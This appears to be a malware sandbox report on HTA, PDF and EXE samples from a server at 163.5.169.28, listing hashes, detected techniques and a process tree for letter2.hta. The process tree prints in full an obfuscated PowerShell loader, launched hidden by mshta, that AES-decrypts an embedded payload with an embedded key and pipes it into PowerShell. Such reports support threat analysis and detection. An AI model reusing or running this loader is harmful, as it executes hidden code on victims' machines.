Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
3163.5.169....r2.pdf
windows10-2004-x64
3163.5.169....r3.hta
windows7-x64
8163.5.169....r3.hta
windows10-2004-x64
8163.5.169....r3.pdf
windows7-x64
3163.5.169....r3.pdf
windows10-2004-x64
3163.5.169....r4.hta
windows7-x64
8163.5.169....r4.hta
windows10-2004-x64
8163.5.169....r4.pdf
windows7-x64
3163.5.169....r4.pdf
windows10-2004-x64
3163.5.169....r5.hta
windows7-x64
8163.5.169....r5.hta
windows10-2004-x64
8163.5.169....r5.pdf
windows7-x64
3163.5.169....r5.pdf
windows10-2004-x64
3163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
3163.5.169.28/cmt.exe
windows10-2004-x64
3163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r4.hta
windows7-x64
8Resubmissions
21-01-2025 13:39
250121-qx27kswrck 1021-01-2025 11:57
250121-n4kvrsskfv 1021-01-2025 11:43
250121-nvpglaslfq 1021-01-2025 11:26
250121-njtbea1qcp 10Analysis
-
max time kernel
12s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 11:26
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
163.5.169.28/cmt.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
163.5.169.28/fd1.exe
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
163.5.169.28/letter.hta
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
163.5.169.28/letter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
163.5.169.28/letter2.hta
Resource
win7-20241010-en
Behavioral task
behavioral31
Sample
163.5.169.28/letter2.hta
Resource
win10v2004-20241007-en
General
-
Target
163.5.169.28/letter2.hta
-
Size
1.1MB
-
MD5
13c9e9f7f8ce9480b18dbc989eb72944
-
SHA1
56a3d29e9aa6859d2f3c599d1a28c5d85d0ee713
-
SHA256
cfe2176b15cb6044459b57401e56b5156a38fc03451d07a9d9b189fcc9fa8f2c
-
SHA512
7389d08afc30a6174486bd2b71039cac41a685df47cb193d5a8d77c1c38464af96ea4ddb39d84f09b05d6941168cc91eb426702adb9647b9863d699215598867
-
SSDEEP
1536:ZS1OkP/2puCdfNXfYP9TjJlNXsY6JAfny2mr/l1vcmafSIm+lIWFYoze/1oFv0+2:ZS1OkP/+FXfQ9TjJQYsAfnyB
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1640 powershell.exe 2936 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 2948 powershell.exe 2936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1236 wrote to memory of 1640 1236 mshta.exe 30 PID 1236 wrote to memory of 1640 1236 mshta.exe 30 PID 1236 wrote to memory of 1640 1236 mshta.exe 30 PID 1236 wrote to memory of 1640 1236 mshta.exe 30 PID 1640 wrote to memory of 2864 1640 powershell.exe 32 PID 1640 wrote to memory of 2864 1640 powershell.exe 32 PID 1640 wrote to memory of 2864 1640 powershell.exe 32 PID 1640 wrote to memory of 2864 1640 powershell.exe 32 PID 2864 wrote to memory of 2936 2864 cmd.exe 34 PID 2864 wrote to memory of 2936 2864 cmd.exe 34 PID 2864 wrote to memory of 2936 2864 cmd.exe 34 PID 2864 wrote to memory of 2936 2864 cmd.exe 34 PID 2864 wrote to memory of 2948 2864 cmd.exe 35 PID 2864 wrote to memory of 2948 2864 cmd.exe 35 PID 2864 wrote to memory of 2948 2864 cmd.exe 35 PID 2864 wrote to memory of 2948 2864 cmd.exe 35
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\letter2.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $snJr = 'AAAAAAAAAAAAAAAAAAAAADpW9dTA5DgzRlmx2hyYEa3OIJrSed0WFVoYmX9mF46cZ9u7qiMYiacsl00iHAKvB18Fx7E5QNwgGuWGTH8CYE66N5r0LXkO6cFPsCSzc5PD5I+iZWA5AeV7Z2EGoXLTP/Xt53Q+zkLj5gUTXZ9jd9w3ta3PT3b/vCT9UVlK3eT2FQlC2madUQ12p1+hKYZDHvUnYRJvV3r7R2KvGxCAUQVxhuFX9Lva4yB/smmOftIiClipmtuaPvPyUmItAzgwFt+0er5mvX94daYt7ZVy3FGpibsglrpDaikgXv9gege0Oe3H00WLa1LzfiMCo7ppDTdU3amdP2z5tLSPWFE2mGKs1W41WxZtQKYuuGJnviKhScYPcTnnQ31Y+la2o1Wfsq2chPrxOe0sdB449/WX3lctelU/ASHx7XzSUIECh2Ub63l4bu509XH8cdrEL3es+pKDW/uZIP8lXj4IPPKcoxV1/dIwCH5hXptBtjZLYX/IAh6KbPF5SP+aWmS6av9dAzPq+3OwmFAQqDGrfsIYAT2z0wMSQBp6JGojIDOoQdjk43DNUvWzrXIxWmRu1p4cah2Hb99sEnbCkEWL7OeV96KwPBlFqN2Hc2v9HDxt05MZW4zRtC03hbxCmhB7EQmkifAsOI7RUn84KSKKpFj+0DuRCe1PkdxiEcrQHHz2mxymnKkeCGIEBr3jPQ8Tbz1QnbL1OsGYmfIWqoPnKnkZuetefGdiiLdNb4qcgzXWY/GHeqQCctnDV14semYSLt3p21DovqwXWNS1atLJ7It3U8n8Gw2rYXhKCYSXgsXsPpHvhnFaEngBmDyP/xx/9oUxhEepEKCdP0ogaPOtJjs2H9ggKckGZKEPo7+y9PWD1XfERGpoGbdg6sRb0K8TLxF7mLXu20DTcuD+CAwnv9N259NHekcQvcmzhUR0Ye9NBQudTnGELPadFxY8lf5MKr8LMzyCa9yT+zyjlFrvTlWlE7bDa8pm08Akyp2wlcKTkocp5wKzReXrVvgKUPyQxgnQlQ==';$yXErscEh = 'RFlkQ2xlY1FXQ0RBV29TTGxoRVVpTVdtSUtwZVdtRXg=';$IeHEsMcl = New-Object 'System.Security.Cryptography.AesManaged';$IeHEsMcl.Mode = [System.Security.Cryptography.CipherMode]::ECB;$IeHEsMcl.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$IeHEsMcl.BlockSize = 128;$IeHEsMcl.KeySize = 256;$IeHEsMcl.Key = [System.Convert]::FromBase64String($yXErscEh);$sIYkM = [System.Convert]::FromBase64String($snJr);$nPVtdTaP = $sIYkM[0..15];$IeHEsMcl.IV = $nPVtdTaP;$hIFKalRAQ = $IeHEsMcl.CreateDecryptor();$vsEyILmvG = $hIFKalRAQ.TransformFinalBlock($sIYkM, 16, $sIYkM.Length - 16);$IeHEsMcl.Dispose();$dSPNfwoK = New-Object System.IO.MemoryStream( , $vsEyILmvG );$jWtGXMG = New-Object System.IO.MemoryStream;$YYsTAwvyZ = New-Object System.IO.Compression.GzipStream $dSPNfwoK, ([IO.Compression.CompressionMode]::Decompress);$YYsTAwvyZ.CopyTo( $jWtGXMG );$YYsTAwvyZ.Close();$dSPNfwoK.Close();[byte[]] $nxTYnfE = $jWtGXMG.ToArray();$ixWuCXOI = [System.Text.Encoding]::UTF8.GetString($nxTYnfE);$ixWuCXOI | powershell - }2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $snJr = 'AAAAAAAAAAAAAAAAAAAAADpW9dTA5DgzRlmx2hyYEa3OIJrSed0WFVoYmX9mF46cZ9u7qiMYiacsl00iHAKvB18Fx7E5QNwgGuWGTH8CYE66N5r0LXkO6cFPsCSzc5PD5I+iZWA5AeV7Z2EGoXLTP/Xt53Q+zkLj5gUTXZ9jd9w3ta3PT3b/vCT9UVlK3eT2FQlC2madUQ12p1+hKYZDHvUnYRJvV3r7R2KvGxCAUQVxhuFX9Lva4yB/smmOftIiClipmtuaPvPyUmItAzgwFt+0er5mvX94daYt7ZVy3FGpibsglrpDaikgXv9gege0Oe3H00WLa1LzfiMCo7ppDTdU3amdP2z5tLSPWFE2mGKs1W41WxZtQKYuuGJnviKhScYPcTnnQ31Y+la2o1Wfsq2chPrxOe0sdB449/WX3lctelU/ASHx7XzSUIECh2Ub63l4bu509XH8cdrEL3es+pKDW/uZIP8lXj4IPPKcoxV1/dIwCH5hXptBtjZLYX/IAh6KbPF5SP+aWmS6av9dAzPq+3OwmFAQqDGrfsIYAT2z0wMSQBp6JGojIDOoQdjk43DNUvWzrXIxWmRu1p4cah2Hb99sEnbCkEWL7OeV96KwPBlFqN2Hc2v9HDxt05MZW4zRtC03hbxCmhB7EQmkifAsOI7RUn84KSKKpFj+0DuRCe1PkdxiEcrQHHz2mxymnKkeCGIEBr3jPQ8Tbz1QnbL1OsGYmfIWqoPnKnkZuetefGdiiLdNb4qcgzXWY/GHeqQCctnDV14semYSLt3p21DovqwXWNS1atLJ7It3U8n8Gw2rYXhKCYSXgsXsPpHvhnFaEngBmDyP/xx/9oUxhEepEKCdP0ogaPOtJjs2H9ggKckGZKEPo7+y9PWD1XfERGpoGbdg6sRb0K8TLxF7mLXu20DTcuD+CAwnv9N259NHekcQvcmzhUR0Ye9NBQudTnGELPadFxY8lf5MKr8LMzyCa9yT+zyjlFrvTlWlE7bDa8pm08Akyp2wlcKTkocp5wKzReXrVvgKUPyQxgnQlQ==';$yXErscEh = 'RFlkQ2xlY1FXQ0RBV29TTGxoRVVpTVdtSUtwZVdtRXg=';$IeHEsMcl = New-Object 'System.Security.Cryptography.AesManaged';$IeHEsMcl.Mode = [System.Security.Cryptography.CipherMode]::ECB;$IeHEsMcl.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$IeHEsMcl.BlockSize = 128;$IeHEsMcl.KeySize = 256;$IeHEsMcl.Key = [System.Convert]::FromBase64String($yXErscEh);$sIYkM = [System.Convert]::FromBase64String($snJr);$nPVtdTaP = $sIYkM[0..15];$IeHEsMcl.IV = $nPVtdTaP;$hIFKalRAQ = $IeHEsMcl.CreateDecryptor();$vsEyILmvG = $hIFKalRAQ.TransformFinalBlock($sIYkM, 16, $sIYkM.Length - 16);$IeHEsMcl.Dispose();$dSPNfwoK = New-Object System.IO.MemoryStream( , $vsEyILmvG );$jWtGXMG = New-Object System.IO.MemoryStream;$YYsTAwvyZ = New-Object System.IO.Compression.GzipStream $dSPNfwoK, ([IO.Compression.CompressionMode]::Decompress);$YYsTAwvyZ.CopyTo( $jWtGXMG );$YYsTAwvyZ.Close();$dSPNfwoK.Close();[byte[]] $nxTYnfE = $jWtGXMG.ToArray();$ixWuCXOI = [System.Text.Encoding]::UTF8.GetString($nxTYnfE);$ixWuCXOI | powershell -3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $snJr = 'AAAAAAAAAAAAAAAAAAAAADpW9dTA5DgzRlmx2hyYEa3OIJrSed0WFVoYmX9mF46cZ9u7qiMYiacsl00iHAKvB18Fx7E5QNwgGuWGTH8CYE66N5r0LXkO6cFPsCSzc5PD5I+iZWA5AeV7Z2EGoXLTP/Xt53Q+zkLj5gUTXZ9jd9w3ta3PT3b/vCT9UVlK3eT2FQlC2madUQ12p1+hKYZDHvUnYRJvV3r7R2KvGxCAUQVxhuFX9Lva4yB/smmOftIiClipmtuaPvPyUmItAzgwFt+0er5mvX94daYt7ZVy3FGpibsglrpDaikgXv9gege0Oe3H00WLa1LzfiMCo7ppDTdU3amdP2z5tLSPWFE2mGKs1W41WxZtQKYuuGJnviKhScYPcTnnQ31Y+la2o1Wfsq2chPrxOe0sdB449/WX3lctelU/ASHx7XzSUIECh2Ub63l4bu509XH8cdrEL3es+pKDW/uZIP8lXj4IPPKcoxV1/dIwCH5hXptBtjZLYX/IAh6KbPF5SP+aWmS6av9dAzPq+3OwmFAQqDGrfsIYAT2z0wMSQBp6JGojIDOoQdjk43DNUvWzrXIxWmRu1p4cah2Hb99sEnbCkEWL7OeV96KwPBlFqN2Hc2v9HDxt05MZW4zRtC03hbxCmhB7EQmkifAsOI7RUn84KSKKpFj+0DuRCe1PkdxiEcrQHHz2mxymnKkeCGIEBr3jPQ8Tbz1QnbL1OsGYmfIWqoPnKnkZuetefGdiiLdNb4qcgzXWY/GHeqQCctnDV14semYSLt3p21DovqwXWNS1atLJ7It3U8n8Gw2rYXhKCYSXgsXsPpHvhnFaEngBmDyP/xx/9oUxhEepEKCdP0ogaPOtJjs2H9ggKckGZKEPo7+y9PWD1XfERGpoGbdg6sRb0K8TLxF7mLXu20DTcuD+CAwnv9N259NHekcQvcmzhUR0Ye9NBQudTnGELPadFxY8lf5MKr8LMzyCa9yT+zyjlFrvTlWlE7bDa8pm08Akyp2wlcKTkocp5wKzReXrVvgKUPyQxgnQlQ==';$yXErscEh = 'RFlkQ2xlY1FXQ0RBV29TTGxoRVVpTVdtSUtwZVdtRXg=';$IeHEsMcl = New-Object 'System.Security.Cryptography.AesManaged';$IeHEsMcl.Mode = [System.Security.Cryptography.CipherMode]::ECB;$IeHEsMcl.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$IeHEsMcl.BlockSize = 128;$IeHEsMcl.KeySize = 256;$IeHEsMcl.Key = [System.Convert]::FromBase64String($yXErscEh);$sIYkM = [System.Convert]::FromBase64String($snJr);$nPVtdTaP = $sIYkM[0..15];$IeHEsMcl.IV = $nPVtdTaP;$hIFKalRAQ = $IeHEsMcl.CreateDecryptor();$vsEyILmvG = $hIFKalRAQ.TransformFinalBlock($sIYkM, 16, $sIYkM.Length - 16);$IeHEsMcl.Dispose();$dSPNfwoK = New-Object System.IO.MemoryStream( , $vsEyILmvG );$jWtGXMG = New-Object System.IO.MemoryStream;$YYsTAwvyZ = New-Object System.IO.Compression.GzipStream $dSPNfwoK, ([IO.Compression.CompressionMode]::Decompress);$YYsTAwvyZ.CopyTo( $jWtGXMG );$YYsTAwvyZ.Close();$dSPNfwoK.Close();[byte[]] $nxTYnfE = $jWtGXMG.ToArray();$ixWuCXOI = [System.Text.Encoding]::UTF8.GetString($nxTYnfE);$ixWuCXOI4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5aa8be7fefa20eda977d6855c8fe3e0c5
SHA14e3e1471b23c8c142ef25ac9ff95eb60dc28260d
SHA256654e0cac9395e79da5a61b934276793216b922b871589067f6aeb50ed3489613
SHA512e923a9187fa28725c0f5f83eb3a3b41750ce6df731a9ce891cfb3fa0d391d45c83f0fdb4e91104c876a80c5c0d9f8c68c4b39ad0db8bff9a688f7b2667b421ea